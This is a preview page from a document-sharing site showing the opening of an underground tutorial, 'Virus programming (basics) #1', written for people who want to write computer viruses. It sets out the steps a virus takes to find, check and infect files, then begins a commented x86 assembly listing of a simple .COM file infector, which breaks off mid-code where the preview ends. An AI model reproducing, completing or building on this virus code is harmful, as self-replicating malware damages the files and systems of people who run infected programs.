virpgm01 - Virus programming(basics#1-This section is...

Info iconThis preview shows pages 1–3. Sign up to view the full content.

View Full Document Right Arrow Icon
Virus programming (basics) #1. .. ----------------------------------------------------------------- This section is dedicated to those who would like to write a virus, but don't have the knowledge to do so. First of all, writing a virus is no big deal. It is an easy project, but one which requires some basic programming skills, and the desire to write a virus! If either of these is missing, writing a virus would be tedious indeed!. Well, if you meet these requisites, keep reading this article. ... JE READ JNE FUCK_YOU! READ: The survival of a virus is based in its ability to reproduce. "So how the fuck do I make a program reproduce?", you might ask. Simple, by getting it to copy itself to other files. ... The functional logic of a virus is as follows: 1- Search for a file to infect 2- Open the file to see if it is infected 3- If infected, search for another file 4- Else, infect the file 5- Return control to the host program. The following is an example of a simple virus: ;**************************************************************** ; START OF THE EXAMPLE: ;**************************************************************** ;Warning, this example is a (piece of shit?) ; - The virus does not test for prior infection ; - it searches only for the first .COM file in the current ; directory ; ; Careful when executing this file, since the first time it's ; executed it will search for and infect the first file in the ; directory. If we later run the newly infected file, it will find ; the first file in its directory, itself. Thus, it will re-infect ; itself over and over. ;===================CODIGO======================================= ;(The variables in a .COM file are relative to offset 100h). codigo segment 'code' org 100h ;Organize all the code starting ; from offset 100h assume cs:codigo,ds:codigo,es:codigo ;Define the use of the ;segments start proc far ;Start the routine COMIENZO: push cs ;Store CS push cs ;Store CS ; once again. pop ds ;Bring DS out from stack pop es ;Bring ES out from stack call falso_proc ;Call proc. so that its ; address is placed in the stack falso_proc proc near
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full Document Right Arrow Icon
falso_proc endp pop bp ;BP<== Proc. address. sub bp, 107h ;BP<== BP - Previous directory ;This is done to take the variables relative to BP, since the ;infection displaces the variables at exactly the length of the ; file. At the first infection, instruction "SUB BP, 107h" is ; 107h, so that the contents of BP is 0; when I call a variable ; with "BP+VARIABLE" the value of the variable's address is not ; modified. When I load it , for example, from a 100h byte
Background image of page 2
Image of page 3
This is the end of the preview. Sign up to access the rest of the document.

{[ snackBarMessage ]}

Page1 / 5

virpgm01 - Virus programming(basics#1-This section is...

This preview shows document pages 1 - 3. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online